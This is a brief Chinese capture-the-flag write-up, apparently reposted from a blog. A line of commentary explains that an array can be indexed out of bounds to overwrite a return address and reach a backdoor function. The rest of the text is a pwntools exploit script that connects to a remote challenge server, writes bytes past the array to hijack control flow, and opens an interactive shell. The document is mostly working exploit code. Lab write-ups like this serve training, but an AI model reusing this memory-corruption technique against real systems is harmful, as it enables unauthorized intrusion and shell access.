标签:image 远程 roc color not from div 检查 rem
经分析,很容易知道这里的数组可以进行越界来修改返回地址的值
有后门函数
from pwn import * def change(offest,by): p.sendafter(‘exit‘,‘3\n‘) p.sendafter(‘r to change:‘,str(offest)+‘\n‘) p.sendafter(‘number:‘,str(by)+‘\n‘) #p=process(‘./pwn‘) p=remote(‘220.249.52.134‘,53030) p.recvuntil("How many numbers you have:\n") p.sendline("1") p.recvuntil("Give me your numbers\n") p.sendline("1") change(0x74+0x10,0x50) change(0x75+0x10,0x84) change(0x76+0x10,0x04) change(0x77+0x10,0x08) change(0x7c+0x10,0x87) change(0x7d+0x10,0x89) change(0x7e+0x10,0x04) change(0x7f+0x10,0x08) p.recvuntil(‘exit‘) p.sendline(‘5‘) p.interactive()
标签:image 远程 roc color not from div 检查 rem
原文地址:https://www.cnblogs.com/pppyyyzzz/p/14158135.html
